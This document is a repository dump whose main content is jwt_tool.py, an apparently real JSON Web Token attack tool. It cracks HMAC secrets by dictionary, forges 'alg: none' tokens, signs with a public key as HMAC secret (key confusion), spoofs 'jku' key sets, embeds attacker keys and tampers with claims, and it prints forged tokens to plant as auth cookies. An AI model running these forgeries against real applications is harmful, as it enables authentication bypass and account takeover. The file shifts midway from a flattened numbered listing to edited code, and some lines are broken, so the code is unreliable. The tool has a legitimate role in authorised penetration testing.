test(sieveOfAtkin,sundaram3,n) 355 | # test(sieveOfAtkin,sieve_wheel_30,n) 356 | # test(sieveOfAtkin,primesfrom3to,n) 357 | # test(sieveOfAtkin,primesfrom2to,n) 358 | # test(sieveOfAtkin,rwh_primes,n) 359 | # test(sieveOfAtkin,rwh_primes1,n) 360 | # test(sieveOfAtkin,rwh_primes2,n) 361 | -------------------------------------------------------------------------------- /grab.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /jwt_tool.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # JWT_Tool version 1.3.2 (23_11_2019) 4 | # Written by ticarpi 5 | # Please use responsibly... 
6 | # Software URL: https://github.com/ticarpi/jwt_tool 7 | # Web: https://www.ticarpi.com 8 | # Twitter: @ticarpi 9 | # 10 | 11 | import sys 12 | import hashlib 13 | import hmac 14 | import base64 15 | import json 16 | import argparse 17 | import datetime 18 | from collections import OrderedDict 19 | try: 20 | from Cryptodome.Signature import PKCS1_v1_5, DSS, pss 21 | from Cryptodome.Hash import SHA256, SHA384, SHA512 22 | from Cryptodome.PublicKey import RSA, ECC 23 | except: 24 | print("WARNING: Cryptodome libraries not imported - these are needed for asymmetric crypto signing and verifying") 25 | print("On most Linux systems you can run the following command to install:") 26 | print("pip3 install pycryptodomex\n") 27 | 28 | def checkSig(sig, contents, key): 29 | quiet = False 30 | if key == "": 31 | print("Type in the key to test") 32 | key = input("> ") 33 | testKey(key.encode(), sig, contents, headDict, quiet) 34 | 35 | def checkSigKid(sig, contents): 36 | quiet = False 37 | print("\nLoading key file...") 38 | try: 39 | key1 = open(keyFile).read() 40 | print("File loaded: "+keyFile) 41 | testKey(key1.encode(), sig, contents, headDict, quiet) 42 | except: 43 | print("Could not load key file") 44 | exit(1) 45 | 46 | def crackSig(sig, contents): 47 | quiet = True 48 | if headDict["alg"][0:2] != "HS": 49 | print("Algorithm is not HMAC-SHA - cannot test against passwords, try the Verify function.") 50 | return 51 | print("\nLoading key dictionary...") 52 | try: 53 | print("File loaded: "+keyList) 54 | keyLst = open(keyList, "r", encoding='utf-8', errors='ignore') 55 | nextKey = keyLst.readline() 56 | except: 57 | print("No dictionary file loaded") 58 | exit(1) 59 | print("Testing passwords in dictionary...") 60 | utf8errors = 0 61 | wordcount = 0 62 | while nextKey: 63 | wordcount += 1 64 | try: 65 | cracked = testKey(nextKey.strip().encode('UTF-8'), sig, contents, headDict, quiet) 66 | except: 67 | cracked = False 68 | if not cracked: 69 | if wordcount % 1000000 
== 0: 70 | print("[*] Tested "+str(int(wordcount/1000000))+" million passwords so far") 71 | try: 72 | nextKey = keyLst.readline() 73 | except: 74 | utf8errors += 1 75 | nextKey = keyLst.readline() 76 | else: 77 | return 78 | if cracked == False: 79 | print("\n[-] Key not in dictionary") 80 | print("\n===============================\nAs your list wasn't able to crack this token you might be better off using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.\nhashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:\n\n[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt\n[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule\n[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6\n===============================\n") 81 | if utf8errors > 0: 82 | print(utf8errors, " UTF-8 incompatible passwords skipped") 83 | 84 | def testKey(key, sig, contents, headDict, quiet): 85 | if headDict["alg"] == "HS256": 86 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha256).digest()).decode('UTF-8').strip("=") 87 | elif headDict["alg"] == "HS384": 88 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha384).digest()).decode('UTF-8').strip("=") 89 | elif headDict["alg"] == "HS512": 90 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha512).digest()).decode('UTF-8').strip("=") 91 | else: 92 | print("Algorithm is not HMAC-SHA - cannot test with this tool.") 93 | exit(1) 94 | if testSig == sig: 95 | cracked = True 96 | if len(key) > 25: 97 | print("\n[+] "+key[0:25].decode('UTF-8')+"...(output trimmed) is the CORRECT key!") 98 | else: 99 | print("\n[+] "+key.decode('UTF-8')+" is the CORRECT key!") 100 | return cracked 101 | else: 102 | cracked = False 103 | if quiet == False: 104 | if len(key) > 25: 
def buildHead(alg, headDict):
    """Return the unpadded url-safe Base64 encoding of the header with "alg" replaced.

    NOTE: mutates the caller's headDict in place (the "alg" claim is
    overwritten). Callers elsewhere re-encode the same dict afterwards, so
    this mutation is deliberately preserved.
    """
    newHead = headDict
    newHead["alg"] = alg
    newHead = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    return newHead

def newRSAKeyPair():
    """Generate a fresh 2048-bit RSA key pair; returns (public PEM, private PEM) as bytes."""
    new_key = RSA.generate(2048, e=65537)
    pubKey = new_key.publickey().exportKey("PEM")
    privKey = new_key.exportKey("PEM")
    return pubKey, privKey

def newECKeyPair():
    """Generate a fresh NIST P-256 EC key pair; returns (public PEM, private PEM) as str."""
    new_key = ECC.generate(curve='P-256')
    pubKey = new_key.public_key().export_key(format="PEM")
    privKey = new_key.export_key(format="PEM")
    return pubKey, privKey

def signToken(headDict, paylDict, key, keyLength):
    """HMAC-sign a header.payload pair with the given secret string.

    keyLength selects SHA-384 (384) or SHA-512 (512); any other value falls
    back to SHA-256, exactly matching the original if/elif/else behaviour.
    The header's "alg" claim is set to "HS"+keyLength (mutates headDict).

    Returns (url-safe signature, standard-Base64 signature, signing input),
    all with Base64 padding stripped.

    Improvement: one digest table and a single HMAC computation replace
    three copy-pasted branches (the digest was previously computed twice
    per branch).
    """
    newHead = headDict
    newHead["alg"] = "HS"+str(keyLength)
    digestmod = {384: hashlib.sha384, 512: hashlib.sha512}.get(keyLength, hashlib.sha256)
    newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    mac = hmac.new(key.encode(), newContents.encode(), digestmod).digest()
    newSig = base64.urlsafe_b64encode(mac).decode('UTF-8').strip("=")
    badSig = base64.b64encode(mac).decode('UTF-8').strip("=")
    return newSig, badSig, newContents
def jwksGen(headDict, paylDict, jku, privateKey, kid="jwt_tool"):
    """Forge an RS256 token for the spoofed-JWKS ("jku" header) attack.

    Either reuses the RSA private key at `privateKey` or generates a fresh
    2048-bit pair, writes a JWKS JSON file describing the public key, points
    the token header's "jku" at `jku`, and signs the token with the private
    key (PKCS#1 v1.5 / SHA-256).

    Returns (urlSig, stdSig, signing input, JWKS JSON text, private key
    filename, JWKS filename). Side effects: writes the private key PEM
    (fresh-key path only) and the JWKS file to the current directory.
    """
    # NOTE: aliases (not copies) the caller's dict — "jku"/"alg" edits below
    # mutate it in place.
    newHead = headDict
    nowtime = str(int(datetime.datetime.now().timestamp()))
    if privateKey:
        # Reuse an existing private key; re-import the public half to read n/e.
        key = RSA.importKey(open(privateKey).read())
        pubKey = key.publickey().exportKey("PEM")
        privKey = key.export_key(format="PEM")
        new_key = RSA.importKey(pubKey)
        # JWK "n"/"e": big-endian byte dumps, url-safe Base64.
        # NOTE(review): 256-byte modulus assumes a 2048-bit key — a different
        # key size would break here; confirm if arbitrary keys are expected.
        n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big'))
        e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big'))
        privKeyName = privateKey
    else:
        # No key supplied: generate one and persist it for later reuse.
        pubKey, privKey = newRSAKeyPair()
        new_key = RSA.importKey(pubKey)
        n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big'))
        e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big'))
        privKeyName = "private_jwttool_RSA_"+nowtime+".pem"
        with open(privKeyName, 'w') as test_priv_out:
            test_priv_out.write(privKey.decode())
    # Minimal JWK: "n" has its Base64 padding stripped, "e" keeps padding
    # (matches what the tool's verification path later decodes).
    newjwks = {}
    newjwks["kty"] = "RSA"
    newjwks["kid"] = kid
    newjwks["use"] = "sig"
    newjwks["e"] = str(e.decode('UTF-8'))
    newjwks["n"] = str(n.decode('UTF-8').rstrip("="))
    newHead["jku"] = jku
    newHead["alg"] = "RS256"
    key = RSA.importKey(privKey)
    # Signing input: b64url(header).b64url(payload), unpadded.
    newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    newContents = newContents.encode('UTF-8')
    h = SHA256.new(newContents)
    signer = PKCS1_v1_5.new(key)
    try:
        signature = signer.sign(h)
    except:
        print("Invalid Private Key")
        exit(1)
    newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=")
    # "badSig" = standard-alphabet Base64 variant, kept for servers that
    # mis-handle the url-safe alphabet.
    badSig = base64.b64encode(signature).decode('UTF-8').strip("=")
    jwksout = json.dumps(newjwks,separators=(",",":"), indent=4)
    jwksName = "jwks_jwttool_RSA_"+nowtime+".json"
    with open(jwksName, 'w') as test_jwks_out:
        test_jwks_out.write(jwksout)
    return newSig, badSig, newContents.decode('UTF-8'), jwksout, privKeyName, jwksName
def jwksEmbed(headDict, paylDict):
    """Forge a token with an embedded "jwk" public key (CVE-2018-0114 style).

    Generates a fresh RSA pair, embeds the public key as a "jwk" claim in
    the header (mutating the caller's dict), sets "alg" to RS256 and signs
    the token with the matching private key via PKCS#1 v1.5 / SHA-256.
    Returns (url-safe signature, standard-Base64 signature, signing input).
    """
    pubKey, privKey = newRSAKeyPair()
    rsa_pub = RSA.importKey(pubKey)
    n_b64 = base64.urlsafe_b64encode(rsa_pub.n.to_bytes(256, byteorder='big'))
    e_b64 = base64.urlsafe_b64encode(rsa_pub.e.to_bytes(3, byteorder='big'))
    headDict["jwk"] = {
        "kty": "RSA",
        "kid": "jwt_tool",
        "use": "sig",
        "e": str(e_b64.decode('UTF-8')),
        "n": str(n_b64.decode('UTF-8').rstrip("=")),
    }
    headDict["alg"] = "RS256"

    def encode_part(claims):
        # Unpadded url-safe Base64 of the compact JSON serialisation.
        raw = json.dumps(claims, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).decode('UTF-8').strip("=")

    signing_input = (encode_part(headDict) + "." + encode_part(paylDict)).encode('UTF-8')
    signer = PKCS1_v1_5.new(RSA.importKey(privKey))
    digest = SHA256.new(signing_input)
    try:
        signature = signer.sign(digest)
    except:
        print("Invalid Private Key")
        exit(1)
    url_sig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=")
    std_sig = base64.b64encode(signature).decode('UTF-8').strip("=")
    return url_sig, std_sig, signing_input.decode('UTF-8')
def signTokenRSA(headDict, paylDict, privKey, keyLength):
    """Sign the token with an RSA private key file (PKCS#1 v1.5).

    keyLength (256/384/512) selects both the "RS<len>" alg claim and the
    SHA-2 digest; anything else exits. Mutates headDict's "alg" in place.
    Returns (url-safe signature, standard-Base64 signature, signing input).

    Improvement: if/elif hash selection replaced with a dispatch table.
    """
    newHead = headDict
    newHead["alg"] = "RS"+str(keyLength)
    key = RSA.importKey(open(privKey).read())
    newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    newContents = newContents.encode('UTF-8')
    hashMods = {256: SHA256, 384: SHA384, 512: SHA512}
    if keyLength not in hashMods:
        print("Invalid RSA key length")
        exit(1)
    h = hashMods[keyLength].new(newContents)
    signer = PKCS1_v1_5.new(key)
    try:
        signature = signer.sign(h)
    except:
        print("Invalid Private Key")
        exit(1)
    newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=")
    badSig = base64.b64encode(signature).decode('UTF-8').strip("=")
    return newSig, badSig, newContents.decode('UTF-8')

def signTokenEC(headDict, paylDict, privKey, keyLength):
    """Sign the token with an ECDSA private key file (FIPS 186-3 DSS).

    keyLength (256/384/512) selects both the "ES<len>" alg claim and the
    SHA-2 digest; anything else exits. Mutates headDict's "alg" in place.
    Returns (url-safe signature, standard-Base64 signature, signing input).

    Fixes: the invalid-length error message previously said "RSA" in this
    ECDSA path; hash selection deduplicated into a table.
    """
    newHead = headDict
    newHead["alg"] = "ES"+str(keyLength)
    key = ECC.import_key(open(privKey).read())
    newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    newContents = newContents.encode('UTF-8')
    hashMods = {256: SHA256, 384: SHA384, 512: SHA512}
    if keyLength not in hashMods:
        print("Invalid ECDSA key length")
        exit(1)
    h = hashMods[keyLength].new(newContents)
    signer = DSS.new(key, 'fips-186-3')
    try:
        signature = signer.sign(h)
    except:
        print("Invalid Private Key")
        exit(1)
    newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=")
    badSig = base64.b64encode(signature).decode('UTF-8').strip("=")
    return newSig, badSig, newContents.decode('UTF-8')
def signTokenPSS(headDict, paylDict, privKey, keyLength):
    """Sign the token with an RSA private key file using RSASSA-PSS.

    keyLength (256/384/512) selects both the "PS<len>" alg claim and the
    SHA-2 digest; anything else exits. Mutates headDict's "alg" in place.
    Returns (url-safe signature, standard-Base64 signature, signing input).

    Improvement: if/elif hash selection replaced with a dispatch table.
    """
    newHead = headDict
    newHead["alg"] = "PS"+str(keyLength)
    key = RSA.importKey(open(privKey).read())
    newContents = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    newContents = newContents.encode('UTF-8')
    hashMods = {256: SHA256, 384: SHA384, 512: SHA512}
    if keyLength not in hashMods:
        print("Invalid RSA key length")
        exit(1)
    h = hashMods[keyLength].new(newContents)
    try:
        signature = pss.new(key).sign(h)
    except:
        print("Invalid Private Key")
        exit(1)
    newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=")
    badSig = base64.b64encode(signature).decode('UTF-8').strip("=")
    return newSig, badSig, newContents.decode('UTF-8')

def verifyTokenRSA(headDict, paylDict, sig, pubKey):
    """Verify an RS256/384/512 token signature against a public key file.

    Re-encodes header.payload from the parsed dicts, re-pads and decodes the
    signature, then verifies with PKCS#1 v1.5. Returns True/False.

    Fixes:
    - `valid` initialised up front — previously an early exception or an
      unsupported alg left it unbound and `return valid` raised NameError.
    - Unsupported alg now returns False instead of crashing on unbound `h`.
    - Signature decoding: one decode with computed padding replaces the
      try-each-padding chain, and sigs containing '_' (url-safe) or '/'
      (standard) but neither '-' nor '+' are no longer rejected outright.
    """
    key = RSA.importKey(open(pubKey).read())
    newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    newContents = newContents.encode('UTF-8')
    valid = False
    if "-" in sig or "_" in sig:
        try:
            sig = base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    elif "+" in sig or "/" in sig:
        try:
            sig = base64.b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    else:
        # No alphabet-specific characters: warn as before, but still attempt
        # a url-safe decode (both alphabets agree on A-Za-z0-9).
        print("Signature not Base64 encoded HEX")
        try:
            sig = base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    hashMods = {"RS256": SHA256, "RS384": SHA384, "RS512": SHA512}
    if headDict['alg'] not in hashMods:
        print("Invalid RSA algorithm")
        return valid
    h = hashMods[headDict['alg']].new(newContents)
    verifier = PKCS1_v1_5.new(key)
    try:
        if verifier.verify(h, sig):
            print("RSA Signature is VALID")
            valid = True
        else:
            print("RSA Signature is INVALID")
            valid = False
    except:
        print("The Public Key is invalid")
    return valid
def verifyTokenEC(headDict, paylDict, sig, pubKey):
    """Verify an ES256/384/512 token signature against a public key file.

    Re-encodes header.payload from the parsed dicts, re-pads and decodes
    the signature, then verifies with DSS (FIPS 186-3). Returns True/False.
    DSS.verify raises on mismatch, so the except path reports INVALID.

    Fixes:
    - Unsupported alg now returns False instead of crashing on unbound `h`.
    - `signature` defaults to None so an undecodable sig reports INVALID
      deterministically instead of relying on an unbound name.
    - Public key file handle is closed (with-statement) instead of leaked.
    - Single padded decode replaces the try-each-padding chain; sigs with
      '_' or '/' but neither '-' nor '+' are no longer rejected outright.
    """
    newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    message = newContents.encode('UTF-8')
    signature = None
    sigStr = str(sig)
    if "-" in sigStr or "_" in sigStr:
        try:
            signature = base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    elif "+" in sigStr or "/" in sigStr:
        try:
            signature = base64.b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    else:
        print("Signature not Base64 encoded HEX")
        try:
            signature = base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    hashMods = {"ES256": SHA256, "ES384": SHA384, "ES512": SHA512}
    if headDict['alg'] not in hashMods:
        print("Invalid ECDSA algorithm")
        return False
    h = hashMods[headDict['alg']].new(message)
    with open(pubKey, "r") as pubKeyFile:
        pub_key = ECC.import_key(pubKeyFile.read())
    verifier = DSS.new(pub_key, 'fips-186-3')
    try:
        verifier.verify(h, signature)
        print("ECC Signature is VALID")
        valid = True
    except:
        print("ECC Signature is INVALID")
        valid = False
    return valid
def verifyTokenPSS(headDict, paylDict, sig, pubKey):
    """Verify a PS256/384/512 (RSASSA-PSS) token signature against a public key file.

    Re-encodes header.payload from the parsed dicts, re-pads and decodes the
    signature, then verifies with pss. pss.verify raises on mismatch, so the
    except path reports INVALID. Returns True/False.

    Fixes:
    - `valid` initialised up front; unsupported alg returns False instead of
      crashing on unbound `h`/`valid` (NameError).
    - Single padded decode replaces the try-each-padding chain; sigs with
      '_' or '/' but neither '-' nor '+' are no longer rejected outright.
    """
    key = RSA.importKey(open(pubKey).read())
    newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
    newContents = newContents.encode('UTF-8')
    valid = False
    if "-" in sig or "_" in sig:
        try:
            sig = base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    elif "+" in sig or "/" in sig:
        try:
            sig = base64.b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    else:
        print("Signature not Base64 encoded HEX")
        try:
            sig = base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))
        except:
            pass
    hashMods = {"PS256": SHA256, "PS384": SHA384, "PS512": SHA512}
    if headDict['alg'] not in hashMods:
        print("Invalid RSA algorithm")
        return valid
    h = hashMods[headDict['alg']].new(newContents)
    verifier = pss.new(key)
    try:
        verifier.verify(h, sig)
        print("RSA-PSS Signature is VALID")
        valid = True
    except:
        print("RSA-PSS Signature is INVALID")
        valid = False
    return valid
def parseJWKS(jwksfile):
    """Parse a JWKS file, print every key's claims, and try to verify the token.

    Handles both a multi-key document ({"keys": [...]}) and a bare single-key
    JWK. For each key, EC (x/y) and RSA (n/e) factors are turned into PEM
    public keys on disk via genECPubFromJWKS/genRSAPubFromJWKS and the token
    is verified against each.

    NOTE(review): relies on module-level headDict, paylDict and sig being
    populated from the target token before this is called — confirm against
    the argument-parsing code outside this view.
    """
    jwks = open(jwksfile, "r").read()
    # OrderedDict preserves the file's claim order for display.
    jwksDict = json.loads(jwks, object_pairs_hook=OrderedDict)
    nowtime = int(datetime.datetime.now().timestamp())
    print("JWKS Contents:")
    try:
        # Multi-key document path: KeyError here falls through to the
        # single-key handler below.
        keyLen = len(jwksDict["keys"])
        print("Number of keys: "+str(keyLen))
        i = -1
        for jkey in range(0,keyLen):
            i += 1
            print("\n--------")
            try:
                print("Key "+str(i+1))
                kid = str(jwksDict["keys"][i]["kid"])
                print("kid: "+kid)
            except:
                # No "kid" claim: fall back to the key's index.
                kid = i
                print("Key "+str(i+1))
            for keyVal in jwksDict["keys"][i].items():
                keyVal = keyVal[0]
                print("[+] "+keyVal+" = "+str(jwksDict["keys"][i][keyVal]))
            try:
                # EC key factors present? Build a PEM and attempt verification.
                x = str(jwksDict["keys"][i]["x"])
                y = str(jwksDict["keys"][i]["y"])
                print("\nFound ECC key factors, generating a public key")
                pubKeyName = genECPubFromJWKS(x, y, kid, nowtime)
                print("[+] "+pubKeyName)
                print("\nAttempting to verify token using "+pubKeyName)
                valid = verifyTokenEC(headDict, paylDict, sig, pubKeyName)
            except:
                pass
            try:
                # RSA key factors present? Build a PEM and attempt verification.
                n = str(jwksDict["keys"][i]["n"])
                e = str(jwksDict["keys"][i]["e"])
                print("\nFound RSA key factors, generating a public key")
                pubKeyName = genRSAPubFromJWKS(n, e, kid, nowtime)
                print("[+] "+pubKeyName)
                print("\nAttempting to verify token using "+pubKeyName)
                valid = verifyTokenRSA(headDict, paylDict, sig, pubKeyName)
            except:
                pass
    except:
        # Single bare JWK: same EC/RSA handling without the "keys" wrapper.
        print("Single key file")
        for jkey in jwksDict:
            print("[+] "+jkey+" = "+str(jwksDict[jkey]))
        try:
            kid = 1
            x = str(jwksDict["x"])
            y = str(jwksDict["y"])
            print("\nFound ECC key factors, generating a public key")
            pubKeyName = genECPubFromJWKS(x, y, kid, nowtime)
            print("[+] "+pubKeyName)
            print("\nAttempting to verify token using "+pubKeyName)
            valid = verifyTokenEC(headDict, paylDict, sig, pubKeyName)
        except:
            pass
        try:
            kid = 1
            n = str(jwksDict["n"])
            e = str(jwksDict["e"])
            print("\nFound RSA key factors, generating a public key")
            pubKeyName = genRSAPubFromJWKS(n, e, kid, nowtime)
            print("[+] "+pubKeyName)
            print("\nAttempting to verify token using "+pubKeyName)
            valid = verifyTokenRSA(headDict, paylDict, sig, pubKeyName)
        except:
            pass
def _b64url_to_int(val):
    """Decode a url-safe Base64 string (padding optional) to a big-endian int.

    Padding is computed instead of trial-and-error. On any decode failure the
    input is returned unchanged, matching the original pass-through behaviour
    (the later key-construction call then fails and is handled by the caller).
    """
    try:
        return int.from_bytes(base64.urlsafe_b64decode(val + "=" * (-len(val) % 4)), byteorder='big')
    except:
        return val

def genECPubFromJWKS(x, y, kid, nowtime):
    """Build a P-256 public key PEM from JWK "x"/"y" factors and write it to disk.

    Returns the generated filename ("kid_<kid>_<nowtime>.pem").
    Improvement: six copy-pasted padding try/except blocks replaced by
    _b64url_to_int with computed padding.
    """
    x = _b64url_to_int(x)
    y = _b64url_to_int(y)
    new_key = ECC.construct(curve='P-256', point_x=x, point_y=y)
    pubKey = new_key.public_key().export_key(format="PEM")+"\n"
    pubKeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem"
    with open(pubKeyName, 'w') as test_pub_out:
        test_pub_out.write(pubKey)
    return pubKeyName

def genRSAPubFromJWKS(n, e, kid, nowtime):
    """Build an RSA public key PEM from JWK "n"/"e" factors and write it to disk.

    Returns the generated filename ("kid_<kid>_<nowtime>.pem").
    Improvement: padding trial-and-error replaced by _b64url_to_int.
    """
    n = _b64url_to_int(n)
    e = _b64url_to_int(e)
    new_key = RSA.construct((n, e))
    pubKey = new_key.publickey().exportKey(format="PEM")
    pubKeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem"
    with open(pubKeyName, 'w') as test_pub_out:
        test_pub_out.write(pubKey.decode()+"\n")
    return pubKeyName
def checkAlgNone(headDict, tok2):
    """Generate "alg: none" tokens (signature-stripping attack) in four casings.

    Builds one signature-less token per alg spelling and prints them all;
    headDict's "alg" is mutated by each buildHead call, as before.
    """
    print("\n====================================================================\nThis option attempts to use the \"none\" algorithm option in some \nimplementations of JWT so that the signature is stripped entirely \nand the token can be freely tampered with. \nIf successful you can use the Tamper options to forge whatever token \ncontent you like!\n====================================================================")
    print("\nGenerating alg-stripped tokens...")
    # One stripped token per alg-claim casing variant.
    stripped = [buildHead(variant, headDict) + "." + tok2 + "."
                for variant in ("none", "None", "NONE", "nOnE")]
    print("\nSet this new token as the AUTH cookie, or session/local \nstorage data (as appropriate for the web application).\n(This will only be valid on unpatched implementations of JWT.)")
    print("\n====================================================================\n")
    print("Your new forged token:")
    print("\"alg\": \"none\":\n"+stripped[0])
    print("\n====================================================================\nSome variants, which may work on some JWT libraries:\n")
    print("\"alg\": \"None\":\n"+stripped[1]+"\n")
    print("\"alg\": \"NONE\":\n"+stripped[2]+"\n")
    print("\"alg\": \"nOnE\":\n"+stripped[3])
    print("====================================================================")
def checkPubKey(headDict, tok2, pubKey):
    """HS/RSA key-confusion attack: HMAC-sign the token using a public key file as the secret.

    Switches the header's alg to HS256 (mutating headDict), signs
    header.payload with the file's text as the HMAC key, and prints the
    forged token. Exits if the key file cannot be read.
    """
    print("\n====================================================================\nThis option takes an available Public Key (the SSL certificate from \na webserver, for example?) and switches the RSA-signed \n(RS256/RS384/RS512) JWT that uses the Public Key as its 'secret'.\n====================================================================")
    try:
        key = open(pubKey).read()
        print("File loaded: "+pubKey)
    except:
        print("[-] File not found")
        exit(1)
    headDict["alg"] = "HS256"
    encodedHead = base64.urlsafe_b64encode(json.dumps(headDict, separators=(",", ":")).encode()).decode('UTF-8').strip("=")
    forged = encodedHead + "." + tok2
    forgedSig = base64.urlsafe_b64encode(hmac.new(key.encode(), forged.encode(), hashlib.sha256).digest()).decode('UTF-8').strip("=")
    print("\nSet this new token as the AUTH cookie, or session/local storage data (as appropriate for the web application).\n(This will only be valid on unpatched implementations of JWT.)")
    print("\n"+forged+"."+forgedSig)
option allows you to tamper with the header, contents and \nsignature of the JWT.\n====================================================================") 622 | print("\nToken header values:") 623 | while True: 624 | i = 0 625 | headList = [0] 626 | for pair in headDict: 627 | menuNum = i+1 628 | if isinstance(headDict[pair], dict): 629 | print("["+str(menuNum)+"] "+pair+" = JSON object:") 630 | for subclaim in headDict[pair]: 631 | print(" [+] "+subclaim+" = "+str(headDict[pair][subclaim])) 632 | else: 633 | print("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair])) 634 | headList.append(pair) 635 | i += 1 636 | print("["+str(i+1)+"] *ADD A VALUE*") 637 | print("["+str(i+2)+"] *DELETE A VALUE*") 638 | print("[0] Continue to next step") 639 | selection = "" 640 | print("\nPlease select a field number:\n(or 0 to Continue)") 641 | try: 642 | selection = int(input("> ")) 643 | except: 644 | print("Invalid selection") 645 | exit(1) 646 | if selection0: 647 | if isinstance(headDict[headList[selection]], dict): 648 | print("\nPlease select a sub-field number for the "+pair+" claim:\n(or 0 to Continue)") 649 | newVal = OrderedDict() 650 | for subclaim in headDict[headList[selection]]: 651 | newVal[subclaim] = headDict[pair][subclaim] 652 | while True: 653 | subList = [0] 654 | s = 0 655 | # for subclaim in headDict[headList[selection]]: 656 | for subclaim in newVal: 657 | subNum = s+1 658 | print("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim])) 659 | s += 1 660 | subList.append(subclaim) 661 | print("["+str(s+1)+"] *ADD A VALUE*") 662 | print("["+str(s+2)+"] *DELETE A VALUE*") 663 | print("[0] Continue to next step") 664 | try: 665 | subSel = int(input("> ")) 666 | except: 667 | print("Invalid selection") 668 | exit(1) 669 | if subSel<=len(newVal) and subSel>0: 670 | selClaim = subList[subSel] 671 | print("\nCurrent value of "+selClaim+" is: "+str(newVal[selClaim])) 672 | print("Please enter new value and hit ENTER") 673 | newVal[selClaim] = input("> ") 674 | 
print() 675 | elif subSel == s+1: 676 | print("Please enter new Key and hit ENTER") 677 | newPair = input("> ") 678 | print("Please enter new value for "+newPair+" and hit ENTER") 679 | newVal[newPair] = input("> ") 680 | elif subSel == s+2: 681 | print("Please select a Key to DELETE and hit ENTER") 682 | s = 0 683 | for subclaim in newVal: 684 | subNum = s+1 685 | print("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim])) 686 | subList.append(subclaim) 687 | s += 1 688 | try: 689 | selSub = int(input("> ")) 690 | except: 691 | print("Invalid selection") 692 | exit(1) 693 | delSub = subList[selSub] 694 | del newVal[delSub] 695 | elif subSel == 0: 696 | print() 697 | break 698 | else: 699 | print("\nCurrent value of "+headList[selection]+" is: "+str(headDict[headList[selection]])) 700 | print("Please enter new value and hit ENTER") 701 | newVal = input("> ") 702 | headDict[headList[selection]] = newVal 703 | elif selection == i+1: 704 | print("Please enter new Key and hit ENTER") 705 | newPair = input("> ") 706 | print("Please enter new value for "+newPair+" and hit ENTER") 707 | newVal = input("> ") 708 | headList.append(newPair) 709 | headDict[headList[selection]] = newVal 710 | elif selection == i+2: 711 | print("Please select a Key to DELETE and hit ENTER") 712 | i = 0 713 | for pair in headDict: 714 | menuNum = i+1 715 | print("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair])) 716 | headList.append(pair) 717 | i += 1 718 | try: 719 | delPair = int(input("> ")) 720 | except: 721 | print("Invalid selection") 722 | exit(1) 723 | del headDict[headList[delPair]] 724 | elif selection == 0: 725 | break 726 | else: 727 | exit(1) 728 | print("\nToken payload values:") 729 | while True: 730 | 